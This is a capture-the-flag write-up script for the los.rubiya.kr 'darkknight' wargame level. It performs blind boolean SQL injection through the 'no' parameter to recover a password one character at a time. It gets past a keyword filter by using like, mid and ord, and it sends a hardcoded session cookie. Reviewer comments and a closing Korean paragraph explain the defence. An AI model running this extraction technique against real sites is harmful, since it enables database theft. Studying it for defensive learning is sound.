import requests

# Write-up script for the los.rubiya.kr "darkknight" wargame level. It recovers
# the `pw` value one character at a time through the `no` query parameter,
# treating the presence of "Hello admin" in the response as a yes/no answer.
#
# Reviewer notes (defensive reading):
# - Presumably `no` reaches the SQL statement as raw text (the challenge source
#   is not shown here). Validating it as an integer and passing it as a bound
#   parameter would remove the injection point.
# - The keyword swaps below show why a keyword denylist is not a fix.
# - A page whose output differs with the truth of the query is a one-bit oracle.
# - Server-side, this run is at most 31 length probes plus at most 96 probes per
#   character, all on one session and differing only in the trailing numbers,
#   a pattern that stands out in access logs.

pw = ""
# NOTE(review): a session id published in a write-up should be treated as
# exposed; keep it out of the source (e.g. read it from the environment).
cookie = {"PHPSESSID": "bs5vokabo2qae2ome4934v09gr"}
page = "darkknight_5cfbc71e68e09f1b039a8204d1a81456"
code = '0 or id like "admin"'

# Equivalents used in place of `=`, `substr` and `ascii`; presumably those are
# the tokens the level's input filter rejects.
andsign = 'and'
equal = 'like'
_substr = 'mid'
_ascii = 'ord'

length = 0


def _probe_url(condition):
    """Return the challenge URL whose `no` value carries *condition*."""
    return f"https://los.rubiya.kr/chall/{page}.php?no={code} {andsign} {condition}"


def _is_true(url):
    """Fetch *url* with the session cookie; True if the page greets admin."""
    # NOTE(review): no timeout= is passed, so a stalled connection blocks the run.
    return "Hello admin" in requests.get(url, cookies=cookie).text


print("find length")
for guess in range(1, 32):
    url = _probe_url(f'length(pw) {equal} {guess}')
    print(url)
    if not _is_true(url):
        continue
    length = guess
    print(guess)
    break

print("find password")
for pos in range(1, length + 1):
    # Code points 32..127 are tried in order; next() stops at the first match,
    # and a position with no match contributes nothing to pw.
    found = next(
        (
            cp
            for cp in range(32, 128)
            if _is_true(_probe_url(f'{_ascii}({_substr}(pw,{pos},1)) {equal} {cp}'))
        ),
        None,
    )
    if found is not None:
        pw += chr(found)
        print(pw)

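substr 대신 mid, ascii 대신 ord, = 대신 like를 쓰면 풀린다. 즉 특정 키워드만 막는 필터는 같은 동작을 하는 다른 함수나 연산자로 우회되므로 방어책이 되지 못하며, 근본적으로는 no 값을 정수로 검증하고 바인딩 파라미터로 쿼리에 전달해야 한다.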
